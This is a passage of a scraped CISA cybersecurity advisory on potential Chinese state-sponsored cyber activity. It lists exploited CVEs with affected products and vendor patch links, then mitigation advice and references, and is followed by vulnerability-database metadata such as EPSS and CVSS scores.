Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0\n| \n\n * [Oracle Critical Patch Update Advisory - October 2016](<https://www.oracle.com/security-alerts/cpuoct2016.html>) \n[CVE-2020-2555](<https://nvd.nist.gov/vuln/detail/CVE-2020-2555>) | \n\n * Oracle Coherence product of Oracle Fusion Middleware Middleware; versions 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.\n| \n\n * [Oracle Critical Patch Update Advisory - January 2020](<https://www.oracle.com/security-alerts/cpujan2020.html>) \n[CVE-2019-3396](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>) | \n\n * Atlassian Confluence Server before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3), and from version 6.14.0 before 6.14.2\n| \n\n * [Jira Atlassian Confluence Sever and Data Center: Remote code execution via Widget Connector macro - CVE-2019-3396](<https://jira.atlassian.com/browse/CONFSERVER-57974>) \n[CVE-2019-11580](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>) | \n\n * Atlassian Crowd and Crowd Data Center from version 2.1.0 before 3.0.5, from version 3.1.0 before 3.1.6, from version 3.2.0 before 3.2.8, from version 3.3.0 before 3.3.5, and from version 3.4.0 before 3.4.4\n| \n\n * [Jira Atlassian Crowd: Crowd - pdkinstall development plugin incorrectly enabled - CVE-2019-11580](<https://jira.atlassian.com/browse/CWD-5388>) \n[CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>) | \n\n * Zoho ManageEngine Desktop Central before 10.0.474\n| \n\n * [ManageEngine Desktop Central remote code execution vulnerability (CVE-2020-10189)](<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>) \n[CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) | \n\n * Progress Telerik UI for ASP.NET AJAX through 2019.3.1023\n| \n\n * [Telerik: ASP.NET AJAX: Allows JavaScriptSerializer Deserialization](<https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization>) \n[CVE-2020-0601](<https://nvd.nist.gov/vuln/detail/CVE-2020-0601>) | \n\n * Windows 10 for 32-bit Systems\n * Windows 10 for x64-based Systems\n * Windows 10 Version 1607 for 32-bit Systems\n * Windows 10 Version 1607 for x64-based Systems\n * Windows 10 Version 1709 for 32-bit Systems\n * Windows 10 Version 1709 for ARM64-based Systems\n * Windows 10 Version 1709 for x64-based Systems\n * Windows 10 Version 1803 for 32-bit Systems\n * Windows 10 Version 1803 for ARM64-based Systems\n * Windows 10 Version 1803 for x64-based Systems\n * Windows 10 Version 1809 for 32-bit Systems\n * Windows 10 Version 1809 for ARM64-based Systems\n * Windows 10 Version 1809 for x64-based Systems\n * Windows 10 Version 1903 for 32-bit Systems\n * Windows 10 Version 1903 for ARM64-based Systems\n * Windows 10 Version 1903 for x64-based Systems\n * Windows 10 Version 1909 for 32-bit Systems\n * Windows 10 Version 1909 for ARM64-based Systems\n * Windows 10 Version 1909 for x64-based Systems\n * Windows Server 2016\n * Windows Server 2016 (Server Core installation)\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1803 (Server Core Installation)\n * Windows Server, version 1903 (Server Core installation)\n * Windows Server, version 1909 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2020-0601](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601>) \n[CVE-2019-0803](<https://nvd.nist.gov/vuln/detail/CVE-2019-0803>) | \n\n * Windows 10 for 32-bit Systems\n * Windows 10 for x64-based Systems\n * Windows 10 Version 1607 for 32-bit Systems\n * Windows 10 Version 1607 for x64-based Systems\n * Windows 10 Version 1703 for 32-bit Systems\n * Windows 10 Version 1703 for x64-based Systems\n * Windows 10 Version 1709 for 32-bit Systems\n * Windows 10 Version 1709 for ARM64-based Systems\n * Windows 10 Version 1709 for x64-based Systems\n * Windows 10 Version 1803 for 32-bit Systems\n * Windows 10 Version 1803 for ARM64-based Systems\n * Windows 10 Version 1803 for x64-based Systems\n * Windows 10 Version 1809 for 32-bit Systems\n * Windows 10 Version 1809 for ARM64-based Systems\n * Windows 10 Version 1809 for x64-based Systems\n * Windows 7 for 32-bit Systems Service Pack 1\n * Windows 7 for x64-based Systems Service Pack 1\n * Windows 8.1 for 32-bit systems\n * Windows 8.1 for x64-based systems\n * Windows RT 8.1\n * Windows Server 2008 for 32-bit Systems Service Pack 2\n * Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 for Itanium-Based Systems Service Pack 2\n * Windows Server 2008 for x64-based Systems Service Pack\n * Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2012 R2 (Server Core installation)\n * Windows Server 2016\n * Windows Server 2016 (Server Core installation)\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1803 (Server Core Installation)\n| \n\n * [Microsoft Security Advisory for CVE-2019-0803](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0803>) \n \n[CVE-2017-6327](<https://nvd.nist.gov/vuln/detail/CVE-2017-6327>) | \n\n * Symantec Messaging Gateway before 10.6.3-267\n| \n\n * [Broadcom Security Updates Detial for CVE-2017-6327 and CVE-2017-6328 ](<https://www.broadcom.com/support/security-center/securityupdates/detail?fid=security_advisory&pvid=security_advisory&year=&suid=20170810_00>) \n[CVE-2020-3118](<https://nvd.nist.gov/vuln/detail/CVE-2020-3118>) | \n\n * ASR 9000 Series Aggregation Services Routers\n * Carrier Routing System (CRS)\n * IOS XRv 9000 Router\n * Network Convergence System (NCS) 540 Series Routers\n * NCS 560 Series Routers\n * NCS 1000 Series Routers\n * NCS 5000 Series Routers\n * NCS 5500 Series Routers\n * NCS 6000 Series Routers\n| \n\n * [Cisco Security Advisory cisco-sa-20200205-iosxr-cdp-rce](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200205-iosxr-cdp-rce>) \n[CVE-2020-8515](<https://nvd.nist.gov/vuln/detail/CVE-2020-8515>) | \n\n * DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices\n| \n\n * [Draytek Security Advisory: Vigor3900 / Vigor2960 / Vigor300B Router Web Management Page Vulnerability (CVE-2020-8515)](<https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-\\(cve-2020-8515\\)/>) \n \n 2. **Implement rigorous configuration management programs. **Audit configuration management programs to ensure they can track and mitigate emerging threats. Review system configurations for misconfigurations and security weaknesses. Implementing a robust configuration and patch management program hinders sophisticated APT operations by limiting the effectiveness of opportunistic attacks. \n\n 3. **Disable unnecessary ports, protocols, and services.** Review network security device logs and determine whether to shut off unnecessary ports and protocols. Monitor common ports and protocols for C2 activity. Turn off or disable any unnecessary services or functionality within devices (e.g., universal plug and play [UPnP], PowerShell). \n\n 4. **Enhance monitoring of network and email traffic.** Review network signatures and indicators for focused operations activities, monitor for new phishing themes, and adjust email rules accordingly. Follow best practices of restricting attachments via email. Ensure that log information is aggregated and correlated to enable maximum detection capabilities, with a focus on monitoring for account misuse. \n\n 5. **Use protection capabilities to stop malicious activity.** Implement antivirus software and other endpoint protection capabilities to automatically detect and prevent malicious files from executing. Use network intrusion detection and prevention systems to identify and prevent commonly employed adversarial malware and limit nefarious data transfers.\n\n### Contact Information\n\nCISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at:\n\n * 1-888-282-0870 (From outside the United States: +1-703-235-8832)\n * [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>) (UNCLASS)\n\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA homepage at <http://www.us-cert.cisa.gov/>.\n\n### References\n\n[[1] White House Publication: How China\u2019s Economic Aggression Threatens the Technologies and Intellectual Property of the United States and the World ](<https://www.whitehouse.gov/wp-content/uploads/2018/06/FINAL-China-Technology-Report-6.18.18-PDF.pdf>)\n\n[[2] Congressional Research Services: 'Made in China 2025' Industrial Policies: Issues for Congress ](<https://fas.org/sgp/crs/row/IF10964.pdf>)\n\n[[3] Council on Foreign Relations: Is \u2018Made in China 2025\u2019 a Threat to Global Trade ](<https://www.cfr.org/backgrounder/made-china-2025-threat-global-trade>)\n\n[[4] Mandiant: APT1 Exposing One of China\u2019s Cyber Espionage Units ](<https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf>)\n\n[[5] U.S. Department of Justice (DOJ) Press Release: U.S. Charges Five Chinese Military Hackers for Cyber Espionage Against U.S. Corporations and a Labor Organization for Commercial Advantage](<https://www.justice.gov/opa/pr/us-charges-five-chinese-military-hackers-cyber-espionage-against-us-corporations-and-labor>)\n\n[[6] CISA Alert TA17-117A: Intrusions Affecting Multiple Victims Across Multiple Sectors](<https://us-cert.cisa.gov/ncas/alerts/TA17-117A>)\n\n[[7] DOJ Press Release: Deputy Attorney General Rod J. Rodenstein Announces Charges Against Chinese Hackers](<https://www.justice.gov/opa/speech/deputy-attorney-general-rod-j-rosenstein-announces-charges-against-chinese-hackers>)\n\n[[8] CISA Awareness Briefing: Chinese Cyber Activity Targeting Managed Service Providers](<https://us-cert.cisa.gov/sites/default/files/publications/Chinese-Cyber-Activity-Targeting-Managed-Service-Providers.pdf>)\n\n[[9] DOJ Press Release: Deputy Attorney General William P. Barr Announces Indictment of Four Members of China\u2019s Military for Hacking into Equifax](<https://www.justice.gov/opa/speech/attorney-general-william-p-barr-announces-indictment-four-members-china-s-military>)\n\n[[10] CISA Press Release: FBI and CISA Warn Against Chinese Targeting of COVID-19 Research Organizations ](<https://www.cisa.gov/news/2020/05/13/fbi-and-cisa-warn-against-chinese-targeting-covid-19-research-organizations>)\n\n[[11] CISA Alert AA20-126A: APT Groups Target Healthcare and Essential Services](<https://us-cert.cisa.gov/ncas/alerts/AA20126A>)\n\n[[12] CISA Current Activity (CA): Chinese Malicious Cyber Activity](<https://us-cert.cisa.gov/ncas/current-activity/2020/08/03/chinese-malicious-cyber-activity>)\n\n[[13] FireEye Advanced Persistent Threat Groups](<https://www.fireeye.com/current-threats/apt-groups.html>)\n\n[[14] MITRE ATT&amp;CK: APT3](<https://attack.mitre.org/groups/G0022/>)\n\n[[15] MITRE ATT&amp;CK: APT19](<https://attack.mitre.org/groups/G0073/>)\n\n[[16] MITRE ATT&amp;CK: APT41](<https://attack.mitre.org/groups/G0096/>)\n\n[[17] CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)\n\n[[18] CISA Alert AA20-020A: Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP](<https://us-cert.cisa.gov/ncas/alerts/aa20-020a>)\n\n[[19] CISA CA: F5 Releases Security Advisory for BIP-IP TMUI RCE Vulnerability, CVE-2020-5902](<https://us-cert.cisa.gov/ncas/current-activity/2020/07/04/f5-releases-security-advisory-big-ip-tmui-rce-vulnerability-cve>)\n\n[[20] CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)\n\n[[21] NSA Advisory: Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>)\n\n### Revisions\n\nOctober 1, 2020: Initial Version|October 20, 2020: Recommended Actions Section Updated\n", "published": "2020-10-20T12:00:00", "modified": "2020-10-20T12:00:00", "epss": [{"cve": "CVE-2012-0158", "epss": 0.97286, "percentile": 0.99787, "modified": "2023-09-21"}, {"cve": "CVE-2015-4852", "epss": 0.96466, "percentile": 0.99401, "modified": "2023-09-14"}, {"cve": "CVE-2017-6327", "epss": 0.53089, "percentile": 0.97101, "modified": "2023-06-23"}, {"cve": "CVE-2017-6328", "epss": 0.00161, "percentile": 0.51646, "modified": "2023-06-23"}, {"cve": "CVE-2018-4939", "epss": 0.97236, "percentile": 0.99732, "modified": "2023-06-23"}, {"cve": "CVE-2018-6789", "epss": 0.97343, "percentile": 0.99818, "modified": "2023-06-23"}, {"cve": "CVE-2019-0708", "epss": 0.97549, "percentile": 0.9999, "modified": "2023-06-13"}, {"cve": "CVE-2019-0803", "epss": 0.00476, "percentile": 0.72262, "modified": "2023-06-13"}, {"cve": "CVE-2019-11510", "epss": 0.97334, "percentile": 0.99806, "modified": "2023-06-13"}, {"cve": "CVE-2019-11580", "epss": 0.97503, "percentile": 0.99961, "modified": "2023-06-13"}, {"cve": "CVE-2019-16278", "epss": 0.97384, "percentile": 0.99853, "modified": "2023-06-13"}, {"cve": "CVE-2019-1652", "epss": 0.97445, "percentile": 0.99909, "modified": "2023-06-13"}, {"cve": "CVE-2019-1653", "epss": 0.97569, "percentile": 0.99998, "modified": "2023-06-13"}, {"cve": "CVE-2019-16920", "epss": 0.96236, "percentile": 0.99265, "modified": "2023-06-13"}, {"cve": "CVE-2019-18935", "epss": 0.90831, "percentile": 0.98349, "modified": "2023-06-13"}, {"cve": "CVE-2019-19781", "epss": 0.97475, "percentile": 0.99939, "modified": "2023-06-13"}, {"cve": "CVE-2019-3396", "epss": 0.975, "percentile": 0.99959, "modified": "2023-06-13"}, {"cve": "CVE-2020-0601", "epss": 0.96839, "percentile": 0.99528, "modified": "2023-07-26"}, {"cve": "CVE-2020-0688", "epss": 0.97274, "percentile": 0.99754, "modified": "2023-06-05"}, {"cve": "CVE-2020-10189", "epss": 0.97136, "percentile": 0.99659, "modified": "2023-06-05"}, {"cve": "CVE-2020-1040", "epss": 0.00315, "percentile": 0.65899, "modified": "2023-06-06"}, {"cve": "CVE-2020-1350", "epss": 0.92805, "percentile": 0.98549, "modified": "2023-06-06"}, {"cve": "CVE-2020-1472", "epss": 0.9732, "percentile": 0.9979, "modified": "2023-06-06"}, {"cve": "CVE-2020-15505", "epss": 0.97516, "percentile": 0.9997, "modified": "2023-06-06"}, {"cve": "CVE-2020-2555", "epss": 0.95477, "percentile": 0.99042, "modified": "2023-06-06"}, {"cve": "CVE-2020-3118", "epss": 0.00219, "percentile": 0.58554, "modified": "2023-06-06"}, {"cve": "CVE-2020-5902", "epss": 0.97567, "percentile": 0.99998, "modified": "2023-06-06"}, {"cve": "CVE-2020-6789", "epss": 0.00065, "percentile": 0.26699, "modified": "2023-06-06"}, {"cve": "CVE-2020-8193", "epss": 0.97458, "percentile": 0.99918, "modified": "2023-06-06"}, {"cve": "CVE-2020-8195", "epss": 0.8899, "percentile": 0.98203, "modified": "2023-06-06"}, {"cve": "CVE-2020-8196", "epss": 0.00201, "percentile": 0.56646, "modified": "2023-06-06"}, {"cve": "CVE-2020-8515", "epss": 0.97183, "percentile": 0.99688, "modified": "2023-06-06"}, {"cve": "CVE-2022-42475", "epss": 0.42232, "percentile": 0.96784, "modified": "2023-06-03"}, {"cve": "CVE-2022-47966", "epss": 0.97445, "percentile": 0.99916, "modified": "2023-09-19"}], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-275a", "reporter": "Industrial Control Systems Cyber Emergency Response Team", "references": ["https://www.facebook.com/sharer/sharer.php?u=https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-275a&title=Potential%20for%20China%20Cyber%20Response%20to%20Heightened%20U.S.%E2%80%93China%20Tensions", "https://twitter.com/intent/tweet?text=Potential%20for%20China%20Cyber%20Response%20to%20Heightened%20U.S.%E2%80%93China%20Tensions+https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-275a", "https://www.linkedin.com/sharing/share-offsite/?url=https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-275a", "mailto:?subject=Potential%20for%20China%20Cyber%20Response%20to%20Heightened%20U.S.%E2%80%93China%20Tensions&body=https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-275a", "https://attack.mitre.org/matrices/enterprise/", "https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF", "https://us-cert.cisa.gov/report", "https://www.whitehouse.gov/wp-content/uploads/2018/06/FINAL-China-Technology-Report-6.18.18-PDF.pdf", "https://fas.org/sgp/crs/row/IF10964.pdf", "https://www.cfr.org/backgrounder/made-china-2025-threat-global-trade", "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", "https://www.justice.gov/opa/pr/us-charges-five-chinese-military-hackers-cyber-espionage-against-us-corporations-and-labor", "https://us-cert.cisa.gov/ncas/alerts/TA17-117A", "https://www.justice.gov/opa/speech/deputy-attorney-general-rod-j-rosenstein-announces-charges-against-chinese-hackers", "https://us-cert.cisa.gov/sites/default/files/publications/Chinese-Cyber-Activity-Targeting-Managed-Service-Providers.pdf", "https://www.justice.gov/opa/speech/attorney-general-william-p-barr-announces-indictment-four-members-china-s-military", "https://www.cisa.gov/news/2020/05/13/fbi-and-cisa-warn-against-chinese-targeting-covid-19-research-organizations", "https://us-cert.cisa.gov/ncas/alerts/AA20126A", "https://us-cert.cisa.gov/ncas/current-activity/2020/08/03/chinese-malicious-cyber-activity%20", "https://attack.mitre.org/tactics/TA0015/", "https://attack.mitre.org/tactics/TA0026/", "https://attack.mitre.org/tactics/TA0025/", "https://attack.mitre.org/techniques/T1330/", "https://attack.mitre.org/techniques/T1334/", "https://attack.mitre.org/techniques/T1326/", "https://attack.mitre.org/techniques/T1247/", "https://attack.mitre.org/techniques/T1254/", "https://attack.mitre.org/techniques/T1288/", "https://attack.mitre.org/techniques/T1362", "https://attack.mitre.org/techniques/T1027/", "https://attack.mitre.org/techniques/T1566/001/", "https://attack.mitre.org/techniques/T1566/002/", "https://attack.mitre.org/techniques/T1016/", "https://attack.mitre.org/techniques/T1059/003/", "https://attack.mitre.org/techniques/T1204/002/", "https://attack.mitre.org/techniques/T1547/001/", "https://attack.mitre.org/techniques/T1059/001/", "https://attack.mitre.org/techniques/T1574/002/", "https://attack.mitre.org/techniques/T1105/", "https://attack.mitre.org/techniques/T1018/", "https://attack.mitre.org/techniques/T1072/", "https://attack.mitre.org/techniques/T1110/003/", "https://attack.mitre.org/techniques/T1046/", "https://attack.mitre.org/techniques/T1114/", "https://attack.mitre.org/techniques/T1090/002/", "https://attack.mitre.org/techniques/T1189/", "https://attack.mitre.org/techniques/T1505/003/", "https://attack.mitre.org/techniques/T1071/002/", "https://attack.mitre.org/techniques/T1071/004/", "https://www.fireeye.com/current-threats/apt-groups.html", "https://attack.mitre.org/groups/G0022/", "https://attack.mitre.org/groups/G0073/", "https://attack.mitre.org/groups/G0096/", "https://us-cert.cisa.gov/ncas/alerts/aa20-133a%20", "https://us-cert.cisa.gov/ncas/alerts/aa20-020a", "https://us-cert.cisa.gov/ncas/current-activity/2020/07/04/f5-releases-security-advisory-big-ip-tmui-rce-vulnerability-cve", "https://us-cert.cisa.gov/ncas/alerts/aa20-133a%20", "https://nvd.nist.gov/vuln/detail/CVE-2012-0158", "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-027", "https://nvd.nist.gov/vuln/detail/CVE-2020-5902", "https://support.f5.com/csp/article/K52145254", "https://nvd.nist.gov/vuln/detail/CVE-2019-19781", "https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/", "https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/", "https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/", "https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/", "https://nvd.nist.gov/vuln/detail/CVE-2019-11510", "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101", "https://nvd.nist.gov/vuln/detail/CVE-2019-16920", "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10124", "https://nvd.nist.gov/vuln/detail/CVE-2019-16278", "https://packetstormsecurity.com/files/155045/Nostromo-1.9.6-Directory-Traversal-Remote-Command-Execution.html", "https://packetstormsecurity.com/files/155802/nostromo-1.9.6-Remote-Code-Execution.html", "https://nvd.nist.gov/vuln/detail/CVE-2019-1652", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject", "https://nvd.nist.gov/vuln/detail/CVE-2019-1653", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info", "https://nvd.nist.gov/vuln/detail/CVE-2020-10189", "https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html", "https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF", "https://nvd.nist.gov/vuln/detail/CVE-2020-8193", "https://support.citrix.com/article/CTX276688", "https://nvd.nist.gov/vuln/detail/CVE-2020-8195", "https://support.citrix.com/article/CTX276688", "https://nvd.nist.gov/vuln/detail/CVE-2020-8196", "https://support.citrix.com/article/CTX276688", "https://nvd.nist.gov/vuln/detail/CVE-2019-0708", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708", "https://nvd.nist.gov/vuln/detail/CVE-2020-15505", "https://www.mobileiron.com/en/blog/mobileiron-security-updates-available", "https://nvd.nist.gov/vuln/detail/CVE-2020-1350", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350", "https://nvd.nist.gov/vuln/detail/CVE-2020-1472", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472", "https://nvd.nist.gov/vuln/detail/CVE-2020-1040", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1040", "https://nvd.nist.gov/vuln/detail/CVE-2018-6789", "https://exim.org/static/doc/security/CVE-2018-6789.txt", "https://git.exim.org/exim.git/commit/cf3cd306062a08969c41a1cdd32c6855f1abecf1", "https://nvd.nist.gov/vuln/detail/CVE-2020-0688", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688", "https://nvd.nist.gov/vuln/detail/CVE-2018-4939", "https://helpx.adobe.com/security/products/coldfusion/apsb18-14.html", "https://nvd.nist.gov/vuln/detail/CVE-2015-4852", "https://www.oracle.com/security-alerts/cpuoct2016.html", "https://nvd.nist.gov/vuln/detail/CVE-2020-2555", "https://www.oracle.com/security-alerts/cpujan2020.html", "https://nvd.nist.gov/vuln/detail/CVE-2019-3396", "https://jira.atlassian.com/browse/CONFSERVER-57974", "https://nvd.nist.gov/vuln/detail/CVE-2019-11580", "https://jira.atlassian.com/browse/CWD-5388", "https://nvd.nist.gov/vuln/detail/CVE-2020-10189", "https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html", "https://nvd.nist.gov/vuln/detail/CVE-2019-18935", "https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization", "https://nvd.nist.gov/vuln/detail/CVE-2020-0601", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601", "https://nvd.nist.gov/vuln/detail/CVE-2019-0803", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0803", "https://nvd.nist.gov/vuln/detail/CVE-2017-6327", "https://www.broadcom.com/support/security-center/securityupdates/detail?fid=security_advisory&pvid=security_advisory&year=&suid=20170810_00", "https://nvd.nist.gov/vuln/detail/CVE-2020-3118", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200205-iosxr-cdp-rce", "https://nvd.nist.gov/vuln/detail/CVE-2020-8515", "https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/", "http://www.us-cert.cisa.gov/", "https://www.whitehouse.gov/wp-content/uploads/2018/06/FINAL-China-Technology-Report-6.18.18-PDF.pdf", "https://fas.org/sgp/crs/row/IF10964.pdf", "https://www.cfr.org/backgrounder/made-china-2025-threat-global-trade", "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", "https://www.justice.gov/opa/pr/us-charges-five-chinese-military-hackers-cyber-espionage-against-us-corporations-and-labor", "https://us-cert.cisa.gov/ncas/alerts/TA17-117A", "https://www.justice.gov/opa/speech/deputy-attorney-general-rod-j-rosenstein-announces-charges-against-chinese-hackers", "https://us-cert.cisa.gov/sites/default/files/publications/Chinese-Cyber-Activity-Targeting-Managed-Service-Providers.pdf", "https://www.justice.gov/opa/speech/attorney-general-william-p-barr-announces-indictment-four-members-china-s-military", "https://www.cisa.gov/news/2020/05/13/fbi-and-cisa-warn-against-chinese-targeting-covid-19-research-organizations", "https://us-cert.cisa.gov/ncas/alerts/AA20126A", "https://us-cert.cisa.gov/ncas/current-activity/2020/08/03/chinese-malicious-cyber-activity", "https://www.fireeye.com/current-threats/apt-groups.html", "https://attack.mitre.org/groups/G0022/", "https://attack.mitre.org/groups/G0073/", "https://attack.mitre.org/groups/G0096/", "https://us-cert.cisa.gov/ncas/alerts/aa20-133a", "https://us-cert.cisa.gov/ncas/alerts/aa20-020a", "https://us-cert.cisa.gov/ncas/current-activity/2020/07/04/f5-releases-security-advisory-big-ip-tmui-rce-vulnerability-cve", "https://us-cert.cisa.gov/ncas/alerts/aa20-133a", "https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF", "https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-275a", "https://www.facebook.com/CISA", "https://twitter.com/CISAgov", "https://www.linkedin.com/company/cybersecurity-and-infrastructure-security-agency", "https://www.youtube.com/@cisagov", "https://www.instagram.com/cisagov", "https://www.dhs.gov/accessibility", "https://www.dhs.gov/performance-financial-reports", "https://www.dhs.gov", "https://www.dhs.gov/foia", "https://www.oig.dhs.gov/", "https://public.govdelivery.com/accounts/USDHSCISA/subscriber/new?topic_id=USDHSCISA_138", "https://www.whitehouse.gov/", "https://www.usa.gov/"], "cvelist": ["CVE-2012-0158", "CVE-2015-4852", "CVE-2017-6327", "CVE-2017-6328", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-16278", "CVE-2019-1652", "CVE-2019-1653", "CVE-2019-16920", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1040", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-6789", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515", "CVE-2022-42475", "CVE-2022-47966"], "immutableFields": [], "lastseen": "2023-09-23T07:29:31", "viewCount": 12, "enchantments": {"dependencies": {"references": [{"type": "0daydb", "idList": ["0DAYDB:137B89027DF0ADFC87056CE176A77441", "0DAYDB:7673EE0281A214ED87D52BA25B8C65BA", "0DAYDB:AF426AEE507511B61499B493AB5C0D11", "0DAYDB:C05243B3F6EF6FD2D281FAA1565DB0D6"]}, {"type": "adobe", "idList": ["APSB18-14"]}, {"type": "almalinux", "idList": ["ALSA-2021:1647"]}, {"type": "alpinelinux", "idList": ["ALPINE:CVE-2018-6789", "ALPINE:CVE-2020-0601", "ALPINE:CVE-2020-1472"]}, {"type": "altlinux", "idList": ["FD4483A7DF9B7189B007C0C774CA4588"]}, {"type": "amazon", "idList": ["ALAS-2018-970", "ALAS-2021-1469", "ALAS2-2021-1585", "ALAS2-2021-1649"]}, {"type": "archlinux", "idList": ["ASA-201802-6", "ASA-202009-17"]}, {"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-57971", "ATLASSIAN:CONFSERVER-57974", "ATLASSIAN:CWD-5388", "CONFSERVER-57971", "CONFSERVER-57974", "CWD-5388"]}, {"type": "attackerkb", "idList": ["AKB:028F0B15-BECA-49C5-9195-C76E72BD1A88", "AKB:03ABAD00-322E-4905-B8D2-E3DA9F049145", 